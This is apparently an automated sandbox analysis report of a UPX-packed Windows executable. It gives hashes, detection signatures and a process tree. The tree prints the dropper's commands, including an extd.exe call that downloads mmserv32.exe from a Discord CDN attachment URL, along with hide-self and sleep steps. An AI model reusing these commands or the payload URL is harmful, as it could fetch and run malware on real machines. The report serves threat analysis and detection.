ca1c052698c5a5c7e5ddcd14a95709288a364cd0be7fa06d03c62c2ead4ea78b

Analysis

max time kernel
149s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240221-en
resource tags

arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
submitted
24-02-2024 12:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a1e0aa315c2caf13f0f7edacea3e9aea.exe
Size

450KB
MD5

a1e0aa315c2caf13f0f7edacea3e9aea
SHA1

3e768bdf99b6e40d8da1a0a74f345c8a316a6b89
SHA256

ca1c052698c5a5c7e5ddcd14a95709288a364cd0be7fa06d03c62c2ead4ea78b
SHA512

40aa04ce71823a9fa163c970263967cba1bec99fff08ff1abb0d5ba0a7b450e9733e9910a63023ca12e26b9d38399b1750676dda70a934e97ecc0f4093c708d0
SSDEEP

12288:0tzE5elwLz9Tr/G89suLMBU2R6rPfgi5QGRTYseAC+kYr8:0tA4KdTDG/hRaAiZRTyRpYA

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 4 IoCs

pid	Process
4704	extd.exe
4436	extd.exe
4192	extd.exe
2308	extd.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023212-4.dat	upx
behavioral2/memory/4704-6-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral2/memory/4704-7-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral2/memory/4436-9-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral2/memory/4436-10-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral2/memory/4192-16-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral2/memory/2308-22-0x0000000140000000-0x00000001400D8000-memory.dmp	upx

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 4940 wrote to memory of 1080	4940	a1e0aa315c2caf13f0f7edacea3e9aea.exe	87
PID 4940 wrote to memory of 1080	4940	a1e0aa315c2caf13f0f7edacea3e9aea.exe	87
PID 1080 wrote to memory of 4704	1080	cmd.exe	88
PID 1080 wrote to memory of 4704	1080	cmd.exe	88
PID 1080 wrote to memory of 4436	1080	cmd.exe	89
PID 1080 wrote to memory of 4436	1080	cmd.exe	89
PID 1080 wrote to memory of 4192	1080	cmd.exe	90
PID 1080 wrote to memory of 4192	1080	cmd.exe	90
PID 1080 wrote to memory of 2308	1080	cmd.exe	94
PID 1080 wrote to memory of 2308	1080	cmd.exe	94

C:\Users\Admin\AppData\Local\Temp\a1e0aa315c2caf13f0f7edacea3e9aea.exe
"C:\Users\Admin\AppData\Local\Temp\a1e0aa315c2caf13f0f7edacea3e9aea.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4940
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\573A.bat C:\Users\Admin\AppData\Local\Temp\a1e0aa315c2caf13f0f7edacea3e9aea.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1080
- - C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:4704
- - C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:4436
- - C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe" "mmserv32.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:4192
- - C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:2308

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1773\mmserv32.exe

Filesize
36B

MD5
a1ca4bebcd03fafbe2b06a46a694e29a

SHA1
ffc88125007c23ff6711147a12f9bba9c3d197ed

SHA256
c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65

SHA512
6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\573A.bat

Filesize
942B

MD5
4cab807999cdd7910b9c43bdb8f7d211

SHA1
42438338c0330a539e92f6430c95c24d7cd8ab63

SHA256
ccbe8fa4538ad416b1b340d8dff530c12d46eb3041350b953456fb09a115de79

SHA512
355d8a31dc40fe01a093eaf390c59fe33bb1281a00d604b0341d02923241b1be16b771a98a6f5d069083efa4e9e801d7b652d1729015f8fd1de0e0f3f7b3f356

Download Submit
C:\Users\Admin\AppData\Local\Temp\5738.tmp\5739.tmp\extd.exe

Filesize
326KB

MD5
c14ce13ab09b4829f67a879d735a10a1

SHA1
537e1ce843f07ce629699ef5742c42ee2f06e9b6

SHA256
ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

SHA512
c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

Download Submit
memory/2308-22-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/4192-16-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/4436-9-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/4436-10-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/4704-6-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/4704-7-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads